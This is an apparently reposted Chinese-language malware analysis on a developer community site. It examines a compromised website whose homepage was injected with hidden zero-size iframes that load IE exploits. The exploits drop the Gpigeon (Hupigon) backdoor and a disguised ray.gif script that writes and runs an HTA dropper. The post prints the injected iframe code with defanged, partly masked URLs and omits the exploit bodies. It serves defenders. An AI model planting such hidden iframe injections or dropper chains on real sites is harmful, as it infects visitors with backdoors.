[07-28] 一个下载灰鸽子Backdoor.Gpigeon.2006等病毒的网站(第2版)-阿里云开发者社区

[07-28] 一个下载灰鸽子Backdoor.Gpigeon.2006等病毒的网站(第2版)

2024-09-29 31

版权

本文内容由阿里云实名注册用户自发贡献，版权归原作者所有，阿里云开发者社区不拥有其著作权，亦不承担相应法律责任。具体规则请查看《阿里云开发者社区用户服务协议》和《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容，填写侵权投诉表单进行举报，一经查实，本社区将立刻删除涉嫌侵权内容。

简介： [07-28] 一个下载灰鸽子Backdoor.Gpigeon.2006等病毒的网站(第2版)

该网站首页被加入代码：

--------------
＜iframe src=hxxp://duolaa***meng.diy.myrice.com/bushan.htm width=0 height=0 frameborder=0＞＜/iframe＞
--------------
hxxp://duolaa***meng.diy.myrice.com/bushan.htm 的代码为：
--------------
＜iframe src=hxxp://duolaa***meng.diy.myrice.com/girl.html width=0 height=0 frameborder=0＞＜/iframe＞
＜iframe src=hxxp://duolaa***meng.diy.myrice.com/xxxxx.htm width=0 height=0 frameborder=0＞＜/iframe＞
＜iframe src=hxxp://duolaa***meng.diy.myrice.com/ray.htm width=0 height=0 frameborder=0＞＜/iframe＞
＜script src="hxxp://www.xcinfo.ha.cn/jsq/default.asp?User=duolaameng&Length=6&x=15&y=20&Mode=002"＞＜/script＞
＜script language=javascript＞
＜!--
var m_tc_server="vip7.t2t2.com";
var m_tc_website="51933";
var m_tc_parent_website="0";
var m_tc_style="1";
//--＞
＜/script＞
＜script language=javascript src="hxxp://vip7.t2t2.com/visit.js"＞＜/script＞
--------------

hxxp://duolaa***meng.diy.myrice.com/girl.html 代码略。Kaspersky报为：Trojan-Downloader.JS.Small.cr，瑞星报为：Hack.Exploit.JS.IeWmv.a。

hxxp://duolaa***meng.diy.myrice.com/xxxxx.htm 代码略。Kaspersky报为 Exploit.HTML.Mht，瑞星报为 Script.Trojan.b。利用IE漏洞下载文件 hxxp://duolaa***meng.diy.myrice.com/xxxxx.chm。

xxxxx.chm 包含2个文件：

1、xxxxx.exe　是灰鸽子文件。Kaspersky 报为 Backdoor.Win32.Hupigon.aho，瑞星报为 Backdoor.Gpigeon.2006.sa，江民KV 报为 Backdoor/Huigezi.eyl。

会把自已复制为 %windir%/Wintimes.exe，创建名为"Wintimes"的系统服务用于启动

HijackThis 1.99.1的log显示为：

---------

O23 - Service: Wintimes - Unknown owner - C:/WINDOWS/Wintimes.exe (file missing)

---------

释放 %windir%/Wintimes.DLL Kaspersky 报为 Backdoor.Win32.Hupigon.buo，瑞星报为 Backdoor.Gpigeon.2006.po。

2、xxxxx.htm Kaspersky报为 Exploit.HTML.CodeBaseExec，瑞星报为 Hack.Exploit.HTML.CodeExec。

hxxp://duolaa***meng.diy.myrice.com/ray.htm 代码略。利用IE漏洞，下载下列文件：

1、hxxp://duolaa***meng.diy.myrice.com/Setup.exe Kaspersky 报为 Backdoor.Win32.Hupigon.buo，瑞星报为 Backdoor.Gpigeon.2006.rz。

2、hxxp://duolaa***meng.diy.myrice.com/ray.exe

未能获取

3、hxxp://duolaa***meng.diy.myrice.com/ray.gif

ray.gif 其实是个脚本程序文件，其功能为：利用ADODB创建并运行文件 NTDETECT.hta。

NTDETECT.hta 在IE临时文件夹里搜索 ray[1].exe 和 ray[2].exe，把它复制为 C:/only23.exe 并运行；创建并运行文件 c:/cmd.bat。

c:/cmd.bat 负责删除 NTDETECT.hta 和 c:/cmd.bat

ray.gif的代码略。可参考：

利用ADODB写文件——恶意文件young.gif代码的分析心得1

javascript:void(0)

hxxp://vip7.t2t2.com/visit.js 是[太极统计]的代码

hxxp://www.xcinfo.ha.cn/jsq/default.asp?User=duolaameng&Length=6&x=15&y=20&Mode=002

[07-28] 一个下载灰鸽子Backdoor.Gpigeon.2006等病毒的网站(第2版)

热门文章

最新文章

相关电子书

热门

活动广场

任务中心

开发者评测

高校计划

乘风者计划

训练营

阿里云MVP

话题

直播

下载

镜像站

技术资料

插件

[07-28] 一个下载灰鸽子Backdoor.Gpigeon.2006等病毒的网站(第2版)

热门文章

最新文章

相关电子书